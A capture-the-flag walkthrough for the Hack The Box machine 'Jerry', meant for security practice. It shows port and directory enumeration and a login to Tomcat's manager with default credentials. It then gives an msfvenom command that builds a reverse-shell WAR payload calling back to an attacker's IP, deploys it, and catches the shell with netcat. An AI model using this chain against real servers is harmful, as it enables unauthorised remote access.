Hack The Box - Jerry Walkthrough without Metasploit

Jerry

Enumeration

We will use the following nmap command to enumerate the box:

nmap -sC -sV 10.10.10.95

Jerry Enumeration

We can see that it only has one port open, the 8080 and that it is running Tomcat/Coyote JSP engine 1.1 if we go to 10.10.10.95:8080 we are presented with the following page:

Apache Tomcat 7.0.88

Since what we have on port 8080 is accessible through web our next step in enumeration is Gobuster (or Dirbuster or any other web enumeration tool you prefer).

GitHub - OJ/gobuster: Directory/File, DNS and VHost busting tool written in GoGitHub

Gobuster

We will run Gobuster with the following flags:

-w: here we will specify the wordlist to use in our case the directory-list-2.3-medium.txt from dirbuster

-t: number of threads in our case since its a CTF environment we will use 40, but for other cases its better to run it with a lower number.

gobuster dir -u http://10.10.10.95:8080/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -t 40

Gobuster First Scan

On this first scan we found an interesting directory /manager, but if we run the scan one more time, this time with a different wordlist this time common.txt from dirb/wordlists:

Gobuster Second Scan

We can see that this time we have more results, but the important one in this case /manager is in both scans, there are multiple lists deppending on what we are looking for.

While trying to access the /manager page we are presented with this prompt to enter user and password:

Manager User / Password

With a quick google search we find a list of default usernames and passwords for Tomcat installations:

Default-Credentials/Apache-Tomcat-Default-Passwords.mdown at master · netbiosX/Default-CredentialsGitHub

Tomcat Default Credentials Combination

In our particular case the combination is:

user: tomcat

password: s3cret

Tomcat Manager Interface

Once we're in the Tomcat Manager Interface we can see at the bottom of the page the Server Information:

Server Information

Most of it we already know, but now we also know it's running on a Windows Server 2012 R2 and its amd64

On top we can see the current Tomcat Applications list:

Tomcat Applications

And what we're interested in, the option to deploy a WAR file:

War File Deploy

Exploitation

Creating the payload

We are going to upload a reverse tcp shell created with msfvenom

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Attackers-IP> LPORT=<Port> -f war > evil.war

msfvenom payload

Uploading the payload

Now we just upload the war using the Tomcat web application:

Uploading evil.war

Once we have deployed it we will be able to see it in the lists of applications:

Evil war deployed

Executing the payload

Set up a netcat listener:

Netcat listener

And now we just click on the /evil application on the tomcat applications list to get a shell back.

Pwnd

Jerry Pwnd